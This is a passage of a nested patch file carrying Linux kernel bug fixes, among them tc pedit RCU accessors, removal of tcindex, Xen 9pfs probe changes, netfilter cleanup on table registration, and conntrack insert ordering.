++	struct tcf_pedit_parms *parms;
++	int nkeys;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	nkeys = parms->tcfp_nkeys;
++	rcu_read_unlock();
++
++	return nkeys;
+ }
+ 
+ static inline u32 tcf_pedit_htype(const struct tc_action *a, int index)
+ {
+-	if (to_pedit(a)->tcfp_keys_ex)
+-		return to_pedit(a)->tcfp_keys_ex[index].htype;
++	u32 htype = TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
++	struct tcf_pedit_parms *parms;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	if (parms->tcfp_keys_ex)
++		htype = parms->tcfp_keys_ex[index].htype;
++	rcu_read_unlock();
+ 
+-	return TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
++	return htype;
+ }
+ 
+ static inline u32 tcf_pedit_cmd(const struct tc_action *a, int index)
+ {
+-	if (to_pedit(a)->tcfp_keys_ex)
+-		return to_pedit(a)->tcfp_keys_ex[index].cmd;
++	struct tcf_pedit_parms *parms;
++	u32 cmd = __PEDIT_CMD_MAX;
+ 
+-	return __PEDIT_CMD_MAX;
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	if (parms->tcfp_keys_ex)
++		cmd = parms->tcfp_keys_ex[index].cmd;
++	rcu_read_unlock();
++
++	return cmd;
+ }
+ 
+ static inline u32 tcf_pedit_mask(const struct tc_action *a, int index)
+ {
+-	return to_pedit(a)->tcfp_keys[index].mask;
++	struct tcf_pedit_parms *parms;
++	u32 mask;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	mask = parms->tcfp_keys[index].mask;
++	rcu_read_unlock();
++
++	return mask;
+ }
+ 
+ static inline u32 tcf_pedit_val(const struct tc_action *a, int index)
+ {
+-	return to_pedit(a)->tcfp_keys[index].val;
++	struct tcf_pedit_parms *parms;
++	u32 val;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	val = parms->tcfp_keys[index].val;
++	rcu_read_unlock();
++
++	return val;
+ }
+ 
+ static inline u32 tcf_pedit_offset(const struct tc_action *a, int index)
+ {
+-	return to_pedit(a)->tcfp_keys[index].off;
++	struct tcf_pedit_parms *parms;
++	u32 off;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	off = parms->tcfp_keys[index].off;
++	rcu_read_unlock();
++
++	return off;
+ }
+ #endif /* __NET_TC_PED_H */
+diff --git a/include/net/tc_wrapper.h b/include/net/tc_wrapper.h
+index d323fffb839aa..8ba241760d0af 100644
+--- a/include/net/tc_wrapper.h
++++ b/include/net/tc_wrapper.h
+@@ -154,7 +154,6 @@ TC_INDIRECT_FILTER_DECLARE(mall_classify);
+ TC_INDIRECT_FILTER_DECLARE(route4_classify);
+ TC_INDIRECT_FILTER_DECLARE(rsvp_classify);
+ TC_INDIRECT_FILTER_DECLARE(rsvp6_classify);
+-TC_INDIRECT_FILTER_DECLARE(tcindex_classify);
+ TC_INDIRECT_FILTER_DECLARE(u32_classify);
+ 
+ static inline int tc_classify(struct sk_buff *skb, const struct tcf_proto *tp,
+@@ -207,10 +206,6 @@ static inline int tc_classify(struct sk_buff *skb, const struct tcf_proto *tp,
+ 	if (tp->classify == rsvp6_classify)
+ 		return rsvp6_classify(skb, tp, res);
+ #endif
+-#if IS_BUILTIN(CONFIG_NET_CLS_TCINDEX)
+-	if (tp->classify == tcindex_classify)
+-		return tcindex_classify(skb, tp, res);
+-#endif
+ 
+ skip:
+ 	return tp->classify(skb, tp, res);
+diff --git a/include/trace/events/f2fs.h b/include/trace/events/f2fs.h
+index 31d994e6b4ca9..35ecb3118c7d5 100644
+--- a/include/trace/events/f2fs.h
++++ b/include/trace/events/f2fs.h
+@@ -1293,6 +1293,43 @@ DEFINE_EVENT(f2fs__page, f2fs_vm_page_mkwrite,
+ 	TP_ARGS(page, type)
+ );
+ 
++TRACE_EVENT(f2fs_replace_atomic_write_block,
++
++	TP_PROTO(struct inode *inode, struct inode *cow_inode, pgoff_t index,
++			block_t old_addr, block_t new_addr, bool recovery),
++
++	TP_ARGS(inode, cow_inode, index, old_addr, new_addr, recovery),
++
++	TP_STRUCT__entry(
++		__field(dev_t,	dev)
++		__field(ino_t,	ino)
++		__field(ino_t,	cow_ino)
++		__field(pgoff_t, index)
++		__field(block_t, old_addr)
++		__field(block_t, new_addr)
++		__field(bool, recovery)
++	),
++
++	TP_fast_assign(
++		__entry->dev		= inode->i_sb->s_dev;
++		__entry->ino		= inode->i_ino;
++		__entry->cow_ino	= cow_inode->i_ino;
++		__entry->index		= index;
++		__entry->old_addr	= old_addr;
++		__entry->new_addr	= new_addr;
++		__entry->recovery	= recovery;
++	),
++
++	TP_printk("dev = (%d,%d), ino = %lu, cow_ino = %lu, index = %lu, "
++			"old_addr = 0x%llx, new_addr = 0x%llx, recovery = %d",
++		show_dev_ino(__entry),
++		__entry->cow_ino,
++		(unsigned long)__entry->index,
++		(unsigned long long)__entry->old_addr,
++		(unsigned long long)__entry->new_addr,
++		__entry->recovery)
++);
++
+ TRACE_EVENT(f2fs_filemap_fault,
+ 
+ 	TP_PROTO(struct inode *inode, pgoff_t index, unsigned long ret),
+diff --git a/include/uapi/linux/usb/video.h b/include/uapi/linux/usb/video.h
+index 6e8e572c2980a..2ff0e8a3a683d 100644
+--- a/include/uapi/linux/usb/video.h
++++ b/include/uapi/linux/usb/video.h
+@@ -179,6 +179,36 @@
+ #define UVC_CONTROL_CAP_AUTOUPDATE			(1 << 3)
+ #define UVC_CONTROL_CAP_ASYNCHRONOUS			(1 << 4)
+ 
++/* 3.9.2.6 Color Matching Descriptor Values */
++enum uvc_color_primaries_values {
++	UVC_COLOR_PRIMARIES_UNSPECIFIED,
++	UVC_COLOR_PRIMARIES_BT_709_SRGB,
++	UVC_COLOR_PRIMARIES_BT_470_2_M,
++	UVC_COLOR_PRIMARIES_BT_470_2_B_G,
++	UVC_COLOR_PRIMARIES_SMPTE_170M,
++	UVC_COLOR_PRIMARIES_SMPTE_240M,
++};
++
++enum uvc_transfer_characteristics_values {
++	UVC_TRANSFER_CHARACTERISTICS_UNSPECIFIED,
++	UVC_TRANSFER_CHARACTERISTICS_BT_709,
++	UVC_TRANSFER_CHARACTERISTICS_BT_470_2_M,
++	UVC_TRANSFER_CHARACTERISTICS_BT_470_2_B_G,
++	UVC_TRANSFER_CHARACTERISTICS_SMPTE_170M,
++	UVC_TRANSFER_CHARACTERISTICS_SMPTE_240M,
++	UVC_TRANSFER_CHARACTERISTICS_LINEAR,
++	UVC_TRANSFER_CHARACTERISTICS_SRGB,
++};
++
++enum uvc_matrix_coefficients {
++	UVC_MATRIX_COEFFICIENTS_UNSPECIFIED,
++	UVC_MATRIX_COEFFICIENTS_BT_709,
++	UVC_MATRIX_COEFFICIENTS_FCC,
++	UVC_MATRIX_COEFFICIENTS_BT_470_2_B_G,
++	UVC_MATRIX_COEFFICIENTS_SMPTE_170M,
++	UVC_MATRIX_COEFFICIENTS_SMPTE_240M,
++};
++
+ /* ------------------------------------------------------------------------
+  * UVC structures
+  */
+diff --git a/include/uapi/linux/uvcvideo.h b/include/uapi/linux/uvcvideo.h
+index 8288137387c0d..a9d0a64007ba5 100644
+--- a/include/uapi/linux/uvcvideo.h
++++ b/include/uapi/linux/uvcvideo.h
+@@ -86,7 +86,7 @@ struct uvc_xu_control_query {
+  * struct. The first two fields are added by the driver, they can be used for
+  * clock synchronisation. The rest is an exact copy of a UVC payload header.
+  * Only complete objects with complete buffers are included. Therefore it's
+- * always sizeof(meta->ts) + sizeof(meta->sof) + meta->length bytes large.
++ * always sizeof(meta->ns) + sizeof(meta->sof) + meta->length bytes large.
+  */
+ struct uvc_meta_buf {
+ 	__u64 ns;
+diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
+index 4a6401080c1f8..3002dc8271959 100644
+--- a/io_uring/kbuf.c
++++ b/io_uring/kbuf.c
+@@ -505,7 +505,7 @@ int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
+ 	}
+ 
+ 	pages = io_pin_pages(reg.ring_addr,
+-			     struct_size(br, bufs, reg.ring_entries),
++			     flex_array_size(br, bufs, reg.ring_entries),
+ 			     &nr_pages);
+ 	if (IS_ERR(pages)) {
+ 		kfree(free_bl);
+diff --git a/kernel/dma/swiotlb.c b/kernel/dma/swiotlb.c
+index a34c38bbe28f1..ef3bc3a5bbed3 100644
+--- a/kernel/dma/swiotlb.c
++++ b/kernel/dma/swiotlb.c
+@@ -300,7 +300,8 @@ static void swiotlb_init_io_tlb_mem(struct io_tlb_mem *mem, phys_addr_t start,
+ 	return;
+ }
+ 
+-static void *swiotlb_memblock_alloc(unsigned long nslabs, unsigned int flags,
++static void __init *swiotlb_memblock_alloc(unsigned long nslabs,
++		unsigned int flags,
+ 		int (*remap)(void *tlb, unsigned long nslabs))
+ {
+ 	size_t bytes = PAGE_ALIGN(nslabs << IO_TLB_SHIFT);
+diff --git a/kernel/fail_function.c b/kernel/fail_function.c
+index a7ccd2930c5f4..d971a01893197 100644
+--- a/kernel/fail_function.c
++++ b/kernel/fail_function.c
+@@ -163,10 +163,7 @@ static void fei_debugfs_add_attr(struct fei_attr *attr)
+ 
+ static void fei_debugfs_remove_attr(struct fei_attr *attr)
+ {
+-	struct dentry *dir;
+-
+-	dir = debugfs_lookup(attr->kp.symbol_name, fei_debugfs_dir);
+-	debugfs_remove_recursive(dir);
++	debugfs_lookup_and_remove(attr->kp.symbol_name, fei_debugfs_dir);
+ }
+ 
+ static int fei_kprobe_handler(struct kprobe *kp, struct pt_regs *regs)
+diff --git a/kernel/irq/ipi.c b/kernel/irq/ipi.c
+index bbd945bacef08..961d4af76af37 100644
+--- a/kernel/irq/ipi.c
++++ b/kernel/irq/ipi.c
+@@ -188,9 +188,9 @@ EXPORT_SYMBOL_GPL(ipi_get_hwirq);
+ static int ipi_send_verify(struct irq_chip *chip, struct irq_data *data,
+ 			   const struct cpumask *dest, unsigned int cpu)
+ {
+-	const struct cpumask *ipimask = irq_data_get_affinity_mask(data);
++	const struct cpumask *ipimask;
+ 
+-	if (!chip || !ipimask)
++	if (!chip || !data)
+ 		return -EINVAL;
+ 
+ 	if (!chip->ipi_send_single && !chip->ipi_send_mask)
+@@ -199,6 +199,10 @@ static int ipi_send_verify(struct irq_chip *chip, struct irq_data *data,
+ 	if (cpu >= nr_cpu_ids)
+ 		return -EINVAL;
+ 
++	ipimask = irq_data_get_affinity_mask(data);
++	if (!ipimask)
++		return -EINVAL;
++
+ 	if (dest) {
+ 		if (!cpumask_subset(dest, ipimask))
+ 			return -EINVAL;
+diff --git a/kernel/printk/index.c b/kernel/printk/index.c
+index c85be186a7832..a6b27526baaf6 100644
+--- a/kernel/printk/index.c
++++ b/kernel/printk/index.c
+@@ -145,7 +145,7 @@ static void pi_create_file(struct module *mod)
+ #ifdef CONFIG_MODULES
+ static void pi_remove_file(struct module *mod)
+ {
+-	debugfs_remove(debugfs_lookup(pi_get_module_name(mod), dfs_index));
++	debugfs_lookup_and_remove(pi_get_module_name(mod), dfs_index);
+ }
+ 
+ static int pi_module_notify(struct notifier_block *nb, unsigned long op,
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index b641cab2745e9..20cd8c9d245e2 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -5604,11 +5604,16 @@ EXPORT_SYMBOL_GPL(ring_buffer_alloc_read_page);
+  */
+ void ring_buffer_free_read_page(struct trace_buffer *buffer, int cpu, void *data)
+ {
+-	struct ring_buffer_per_cpu *cpu_buffer = buffer->buffers[cpu];
++	struct ring_buffer_per_cpu *cpu_buffer;
+ 	struct buffer_data_page *bpage = data;
+ 	struct page *page = virt_to_page(bpage);
+ 	unsigned long flags;
+ 
++	if (!buffer || !buffer->buffers || !buffer->buffers[cpu])
++		return;
++
++	cpu_buffer = buffer->buffers[cpu];
++
+ 	/* If the page is still in use someplace else, we can't reuse it */
+ 	if (page_ref_count(page) > 1)
+ 		goto out;
+diff --git a/net/9p/trans_rdma.c b/net/9p/trans_rdma.c
+index 83f9100d46bff..b84748baf9cbe 100644
+--- a/net/9p/trans_rdma.c
++++ b/net/9p/trans_rdma.c
+@@ -385,6 +385,7 @@ post_recv(struct p9_client *client, struct p9_rdma_context *c)
+ 	struct p9_trans_rdma *rdma = client->trans;
+ 	struct ib_recv_wr wr;
+ 	struct ib_sge sge;
++	int ret;
+ 
+ 	c->busa = ib_dma_map_single(rdma->cm_id->device,
+ 				    c->rc.sdata, client->msize,
+@@ -402,7 +403,12 @@ post_recv(struct p9_client *client, struct p9_rdma_context *c)
+ 	wr.wr_cqe = &c->cqe;
+ 	wr.sg_list = &sge;
+ 	wr.num_sge = 1;
+-	return ib_post_recv(rdma->qp, &wr, NULL);
++
++	ret = ib_post_recv(rdma->qp, &wr, NULL);
++	if (ret)
++		ib_dma_unmap_single(rdma->cm_id->device, c->busa,
++				    client->msize, DMA_FROM_DEVICE);
++	return ret;
+ 
+  error:
+ 	p9_debug(P9_DEBUG_ERROR, "EIO\n");
+@@ -499,7 +505,7 @@ dont_need_post_recv:
+ 
+ 	if (down_interruptible(&rdma->sq_sem)) {
+ 		err = -EINTR;
+-		goto send_error;
++		goto dma_unmap;
+ 	}
+ 
+ 	/* Mark request as `sent' *before* we actually send it,
+@@ -509,11 +515,14 @@ dont_need_post_recv:
+ 	WRITE_ONCE(req->status, REQ_STATUS_SENT);
+ 	err = ib_post_send(rdma->qp, &wr, NULL);
+ 	if (err)
+-		goto send_error;
++		goto dma_unmap;
+ 
+ 	/* Success */
+ 	return 0;
+ 
++dma_unmap:
++	ib_dma_unmap_single(rdma->cm_id->device, c->busa,
++			    c->req->tc.size, DMA_TO_DEVICE);
+  /* Handle errors that happened during or while preparing the send: */
+  send_error:
+ 	WRITE_ONCE(req->status, REQ_STATUS_ERROR);
+diff --git a/net/9p/trans_xen.c b/net/9p/trans_xen.c
+index 82c7005ede656..c64050e839ac6 100644
+--- a/net/9p/trans_xen.c
++++ b/net/9p/trans_xen.c
+@@ -372,19 +372,24 @@ out:
+ 	return ret;
+ }
+ 
+-static int xen_9pfs_front_probe(struct xenbus_device *dev,
+-				const struct xenbus_device_id *id)
++static int xen_9pfs_front_init(struct xenbus_device *dev)
+ {
+ 	int ret, i;
+ 	struct xenbus_transaction xbt;
+-	struct xen_9pfs_front_priv *priv = NULL;
+-	char *versions;
++	struct xen_9pfs_front_priv *priv = dev_get_drvdata(&dev->dev);
++	char *versions, *v;
+ 	unsigned int max_rings, max_ring_order, len = 0;
+ 
+ 	versions = xenbus_read(XBT_NIL, dev->otherend, "versions", &len);
+ 	if (IS_ERR(versions))
+ 		return PTR_ERR(versions);
+-	if (strcmp(versions, "1")) {
++	for (v = versions; *v; v++) {
++		if (simple_strtoul(v, &v, 10) == 1) {
++			v = NULL;
++			break;
++		}
++	}
++	if (v) {
+ 		kfree(versions);
+ 		return -EINVAL;
+ 	}
+@@ -399,11 +404,6 @@ static int xen_9pfs_front_probe(struct xenbus_device *dev,
+ 	if (p9_xen_trans.maxsize > XEN_FLEX_RING_SIZE(max_ring_order))
+ 		p9_xen_trans.maxsize = XEN_FLEX_RING_SIZE(max_ring_order) / 2;
+ 
+-	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+-	if (!priv)
+-		return -ENOMEM;
+-
+-	priv->dev = dev;
+ 	priv->num_rings = XEN_9PFS_NUM_RINGS;
+ 	priv->rings = kcalloc(priv->num_rings, sizeof(*priv->rings),
+ 			      GFP_KERNEL);
+@@ -462,23 +462,35 @@ static int xen_9pfs_front_probe(struct xenbus_device *dev,
+ 		goto error;
+ 	}
+ 
+-	write_lock(&xen_9pfs_lock);
+-	list_add_tail(&priv->list, &xen_9pfs_devs);
+-	write_unlock(&xen_9pfs_lock);
+-	dev_set_drvdata(&dev->dev, priv);
+-	xenbus_switch_state(dev, XenbusStateInitialised);
+-
+ 	return 0;
+ 
+  error_xenbus:
+ 	xenbus_transaction_end(xbt, 1);
+ 	xenbus_dev_fatal(dev, ret, "writing xenstore");
+  error:
+-	dev_set_drvdata(&dev->dev, NULL);
+ 	xen_9pfs_front_free(priv);
+ 	return ret;
+ }
+ 
++static int xen_9pfs_front_probe(struct xenbus_device *dev,
++				const struct xenbus_device_id *id)
++{
++	struct xen_9pfs_front_priv *priv = NULL;
++
++	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
++	if (!priv)
++		return -ENOMEM;
++
++	priv->dev = dev;
++	dev_set_drvdata(&dev->dev, priv);
++
++	write_lock(&xen_9pfs_lock);
++	list_add_tail(&priv->list, &xen_9pfs_devs);
++	write_unlock(&xen_9pfs_lock);
++
++	return 0;
++}
++
+ static int xen_9pfs_front_resume(struct xenbus_device *dev)
+ {
+ 	dev_warn(&dev->dev, "suspend/resume unsupported\n");
+@@ -497,6 +509,8 @@ static void xen_9pfs_front_changed(struct xenbus_device *dev,
+ 		break;
+ 
+ 	case XenbusStateInitWait:
++		if (!xen_9pfs_front_init(dev))
++			xenbus_switch_state(dev, XenbusStateInitialised);
+ 		break;
+ 
+ 	case XenbusStateConnected:
+diff --git a/net/bridge/netfilter/ebtables.c b/net/bridge/netfilter/ebtables.c
+index ce5dfa3babd26..757ec46fc45a0 100644
+--- a/net/bridge/netfilter/ebtables.c
++++ b/net/bridge/netfilter/ebtables.c
+@@ -1090,7 +1090,7 @@ static int do_replace_finish(struct net *net, struct ebt_replace *repl,
+ 
+ 	audit_log_nfcfg(repl->name, AF_BRIDGE, repl->nentries,
+ 			AUDIT_XT_OP_REPLACE, GFP_KERNEL);
+-	return ret;
++	return 0;
+ 
+ free_unlock:
+ 	mutex_unlock(&ebt_mutex);
+diff --git a/net/core/dev.c b/net/core/dev.c
+index f23e287602b7e..fce980d531bdc 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -3131,8 +3131,10 @@ void __dev_kfree_skb_any(struct sk_buff *skb, enum skb_free_reason reason)
+ {
+ 	if (in_hardirq() || irqs_disabled())
+ 		__dev_kfree_skb_irq(skb, reason);
++	else if (unlikely(reason == SKB_REASON_DROPPED))
++		kfree_skb(skb);
+ 	else
+-		dev_kfree_skb(skb);
++		consume_skb(skb);
+ }
+ EXPORT_SYMBOL(__dev_kfree_skb_any);
+ 
+diff --git a/net/ipv4/netfilter/arp_tables.c b/net/ipv4/netfilter/arp_tables.c
+index ffc0cab7cf189..2407066b0fec1 100644
+--- a/net/ipv4/netfilter/arp_tables.c
++++ b/net/ipv4/netfilter/arp_tables.c
+@@ -1525,6 +1525,10 @@ int arpt_register_table(struct net *net,
+ 
+ 	new_table = xt_register_table(net, table, &bootstrap, newinfo);
+ 	if (IS_ERR(new_table)) {
++		struct arpt_entry *iter;
++
++		xt_entry_foreach(iter, loc_cpu_entry, newinfo->size)
++			cleanup_entry(iter, net);
+ 		xt_free_table_info(newinfo);
+ 		return PTR_ERR(new_table);
+ 	}
+diff --git a/net/ipv4/netfilter/ip_tables.c b/net/ipv4/netfilter/ip_tables.c
+index 2ed7c58b471ac..da5998011ab9b 100644
+--- a/net/ipv4/netfilter/ip_tables.c
++++ b/net/ipv4/netfilter/ip_tables.c
+@@ -1045,7 +1045,6 @@ __do_replace(struct net *net, const char *name, unsigned int valid_hooks,
+ 	struct xt_counters *counters;
+ 	struct ipt_entry *iter;
+ 
+-	ret = 0;
+ 	counters = xt_counters_alloc(num_counters);
+ 	if (!counters) {
+ 		ret = -ENOMEM;
+@@ -1091,7 +1090,7 @@ __do_replace(struct net *net, const char *name, unsigned int valid_hooks,
+ 		net_warn_ratelimited("iptables: counters copy to user failed while replacing table\n");
+ 	}
+ 	vfree(counters);
+-	return ret;
++	return 0;
+ 
+  put_module:
+ 	module_put(t->me);
+@@ -1742,6 +1741,10 @@ int ipt_register_table(struct net *net, const struct xt_table *table,
+ 
+ 	new_table = xt_register_table(net, table, &bootstrap, newinfo);
+ 	if (IS_ERR(new_table)) {
++		struct ipt_entry *iter;
++
++		xt_entry_foreach(iter, loc_cpu_entry, newinfo->size)
++			cleanup_entry(iter, net);
+ 		xt_free_table_info(newinfo);
+ 		return PTR_ERR(new_table);
+ 	}
+diff --git a/net/ipv4/tcp_minisocks.c b/net/ipv4/tcp_minisocks.c
+index e002f2e1d4f2d..9a7ef7732c24c 100644
+--- a/net/ipv4/tcp_minisocks.c
++++ b/net/ipv4/tcp_minisocks.c
+@@ -597,6 +597,9 @@ EXPORT_SYMBOL(tcp_create_openreq_child);
+  * validation and inside tcp_v4_reqsk_send_ack(). Can we do better?
+  *
+  * We don't need to initialize tmp_opt.sack_ok as we don't use the results
++ *
++ * Note: If @fastopen is true, this can be called from process context.
++ *       Otherwise, this is from BH context.
+  */
+ 
+ struct sock *tcp_check_req(struct sock *sk, struct sk_buff *skb,
+@@ -748,7 +751,7 @@ struct sock *tcp_check_req(struct sock *sk, struct sk_buff *skb,
+ 					  &tcp_rsk(req)->last_oow_ack_time))
+ 			req->rsk_ops->send_ack(sk, skb, req);
+ 		if (paws_reject)
+-			__NET_INC_STATS(sock_net(sk), LINUX_MIB_PAWSESTABREJECTED);
++			NET_INC_STATS(sock_net(sk), LINUX_MIB_PAWSESTABREJECTED);
+ 		return NULL;
+ 	}
+ 
+@@ -767,7 +770,7 @@ struct sock *tcp_check_req(struct sock *sk, struct sk_buff *skb,
+ 	 *	   "fourth, check the SYN bit"
+ 	 */
+ 	if (flg & (TCP_FLAG_RST|TCP_FLAG_SYN)) {
+-		__TCP_INC_STATS(sock_net(sk), TCP_MIB_ATTEMPTFAILS);
++		TCP_INC_STATS(sock_net(sk), TCP_MIB_ATTEMPTFAILS);
+ 		goto embryonic_reset;
+ 	}
+ 
+diff --git a/net/ipv6/netfilter/ip6_tables.c b/net/ipv6/netfilter/ip6_tables.c
+index 2d816277f2c5a..0ce0ed17c7583 100644
+--- a/net/ipv6/netfilter/ip6_tables.c
++++ b/net/ipv6/netfilter/ip6_tables.c
+@@ -1062,7 +1062,6 @@ __do_replace(struct net *net, const char *name, unsigned int valid_hooks,
+ 	struct xt_counters *counters;
+ 	struct ip6t_entry *iter;
+ 
+-	ret = 0;
+ 	counters = xt_counters_alloc(num_counters);
+ 	if (!counters) {
+ 		ret = -ENOMEM;
+@@ -1108,7 +1107,7 @@ __do_replace(struct net *net, const char *name, unsigned int valid_hooks,
+ 		net_warn_ratelimited("ip6tables: counters copy to user failed while replacing table\n");
+ 	}
+ 	vfree(counters);
+-	return ret;
++	return 0;
+ 
+  put_module:
+ 	module_put(t->me);
+@@ -1751,6 +1750,10 @@ int ip6t_register_table(struct net *net, const struct xt_table *table,
+ 
+ 	new_table = xt_register_table(net, table, &bootstrap, newinfo);
+ 	if (IS_ERR(new_table)) {
++		struct ip6t_entry *iter;
++
++		xt_entry_foreach(iter, loc_cpu_entry, newinfo->size)
++			cleanup_entry(iter, net);
+ 		xt_free_table_info(newinfo);
+ 		return PTR_ERR(new_table);
+ 	}
+diff --git a/net/ipv6/netfilter/ip6t_rpfilter.c b/net/ipv6/netfilter/ip6t_rpfilter.c
+index a01d9b842bd07..67c87a88cde4f 100644
+--- a/net/ipv6/netfilter/ip6t_rpfilter.c
++++ b/net/ipv6/netfilter/ip6t_rpfilter.c
+@@ -72,7 +72,9 @@ static bool rpfilter_lookup_reverse6(struct net *net, const struct sk_buff *skb,
+ 		goto out;
+ 	}
+ 
+-	if (rt->rt6i_idev->dev == dev || (flags & XT_RPFILTER_LOOSE))
++	if (rt->rt6i_idev->dev == dev ||
++	    l3mdev_master_ifindex_rcu(rt->rt6i_idev->dev) == dev->ifindex ||
++	    (flags & XT_RPFILTER_LOOSE))
+ 		ret = true;
+  out:
+ 	ip6_rt_put(rt);
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index e74e0361fd921..a6983a13dd205 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -5540,16 +5540,17 @@ static size_t rt6_nlmsg_size(struct fib6_info *f6i)
+ 		nexthop_for_each_fib6_nh(f6i->nh, rt6_nh_nlmsg_size,
+ 					 &nexthop_len);
+ 	} else {
++		struct fib6_info *sibling, *next_sibling;
+ 		struct fib6_nh *nh = f6i->fib6_nh;
+ 
+ 		nexthop_len = 0;
+ 		if (f6i->fib6_nsiblings) {
+-			nexthop_len = nla_total_size(0)	 /* RTA_MULTIPATH */
+-				    + NLA_ALIGN(sizeof(struct rtnexthop))
+-				    + nla_total_size(16) /* RTA_GATEWAY */
+-				    + lwtunnel_get_encap_size(nh->fib_nh_lws);
++			rt6_nh_nlmsg_size(nh, &nexthop_len);
+ 
+-			nexthop_len *= f6i->fib6_nsiblings;
++			list_for_each_entry_safe(sibling, next_sibling,
++						 &f6i->fib6_siblings, fib6_siblings) {
++				rt6_nh_nlmsg_size(sibling->fib6_nh, &nexthop_len);
++			}
+ 		}
+ 		nexthop_len += lwtunnel_get_encap_size(nh->fib_nh_lws);
+ 	}
+diff --git a/net/netfilter/core.c b/net/netfilter/core.c
+index 5a6705a0e4ecf..6e80f0f6149ea 100644
+--- a/net/netfilter/core.c
++++ b/net/netfilter/core.c
+@@ -669,6 +669,9 @@ const struct nf_ct_hook __rcu *nf_ct_hook __read_mostly;
+ EXPORT_SYMBOL_GPL(nf_ct_hook);
+ 
+ #if IS_ENABLED(CONFIG_NF_CONNTRACK)
++u8 nf_ctnetlink_has_listener;
++EXPORT_SYMBOL_GPL(nf_ctnetlink_has_listener);
++
+ const struct nf_nat_hook __rcu *nf_nat_hook __read_mostly;
+ EXPORT_SYMBOL_GPL(nf_nat_hook);
+ 
+diff --git a/net/netfilter/nf_conntrack_bpf.c b/net/netfilter/nf_conntrack_bpf.c
+index 24002bc61e07e..e1af14e3b63c5 100644
+--- a/net/netfilter/nf_conntrack_bpf.c
++++ b/net/netfilter/nf_conntrack_bpf.c
+@@ -381,7 +381,6 @@ struct nf_conn *bpf_ct_insert_entry(struct nf_conn___init *nfct_i)
+ 	struct nf_conn *nfct = (struct nf_conn *)nfct_i;
+ 	int err;
+ 
+-	nfct->status |= IPS_CONFIRMED;
+ 	err = nf_conntrack_hash_check_insert(nfct);
+ 	if (err < 0) {
+ 		nf_conntrack_free(nfct);
+diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
+index 496c4920505b3..ead11a9c261f3 100644
+--- a/net/netfilter/nf_conntrack_core.c
++++ b/net/netfilter/nf_conntrack_core.c
+@@ -886,10 +886,8 @@ nf_conntrack_hash_check_insert(struct nf_conn *ct)
+ 
+ 	zone = nf_ct_zone(ct);
+ 
+-	if (!nf_ct_ext_valid_pre(ct->ext)) {
+-		NF_CT_STAT_INC_ATOMIC(net, insert_failed);
+-		return -ETIMEDOUT;
+-	}
++	if (!nf_ct_ext_valid_pre(ct->ext))
++		return -EAGAIN;
+ 
+ 	local_bh_disable();
+ 	do {
+@@ -924,6 +922,19 @@ nf_conntrack_hash_check_insert(struct nf_conn *ct)
+ 			goto chaintoolong;
+ 	}
+ 
++	/* If genid has changed, we can't insert anymore because ct
++	 * extensions could have stale pointers and nf_ct_iterate_destroy
++	 * might have completed its table scan already.
++	 *
++	 * Increment of the ext genid right after this check is fine:
++	 * nf_ct_iterate_destroy blocks until locks are released.
++	 */
++	if (!nf_ct_ext_valid_post(ct->ext)) {
++		err = -EAGAIN;
++		goto out;
++	}
++
++	ct->status |= IPS_CONFIRMED;
+ 	smp_wmb();
+ 	/* The caller holds a reference to this object */
+ 	refcount_set(&ct->ct_general.use, 2);
+@@ -932,12 +943,6 @@ nf_conntrack_hash_check_insert(struct nf_conn *ct)
+ 	NF_CT_STAT_INC(net, insert);
+ 	local_bh_enable();
+ 
+-	if (!nf_ct_ext_valid_post(ct->ext)) {
+-		nf_ct_kill(ct);
+-		NF_CT_STAT_INC_ATOMIC(net, drop);
+-		return -ETIMEDOUT;
+-	}
+-
+ 	return 0;
+ chaintoolong:
+ 	NF_CT_STAT_INC(net, chaintoolong);
+diff --git a/net/netfilter/nf_conntrack_ecache.c b/net/netfilter/nf_conntrack_ecache.c
+index 8698b34246460..69948e1d6974e 100644
+--- a/net/netfilter/nf_conntrack_ecache.c
++++ b/net/netfilter/nf_conntrack_ecache.c
+@@ -309,7 +309,7 @@ bool nf_ct_ecache_ext_add(struct nf_conn *ct, u16 ctmask, u16 expmask, gfp_t gfp
+ 			break;
+ 		return true;
+ 	case 2: /* autodetect: no event listener, don't allocate extension. */
+-		if (!READ_ONCE(net->ct.ctnetlink_has_listener))
++		if (!READ_ONCE(nf_ctnetlink_has_listener))
+ 			return true;
+ 		fallthrough;
+ 	case 1:
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index 1286ae7d46096..733bb56950c14 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -2316,9 +2316,6 @@ ctnetlink_create_conntrack(struct net *net,
+ 	nfct_seqadj_ext_add(ct);
+ 	nfct_synproxy_ext_add(ct);
+ 
+-	/* we must add conntrack extensions before confirmation. */
+-	ct->status |= IPS_CONFIRMED;
+-
+ 	if (cda[CTA_STATUS]) {
+ 		err = ctnetlink_change_status(ct, cda);
+ 		if (err < 0)
+@@ -2375,12 +2372,15 @@ ctnetlink_create_conntrack(struct net *net,
+ 
+ 	err = nf_conntrack_hash_check_insert(ct);
+ 	if (err < 0)
+-		goto err2;
++		goto err3;
+ 
+ 	rcu_read_unlock();
+ 
+ 	return ct;
+ 
++err3:
++	if (ct->master)
++		nf_ct_put(ct->master);
+ err2:
+ 	rcu_read_unlock();
+ err1:
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
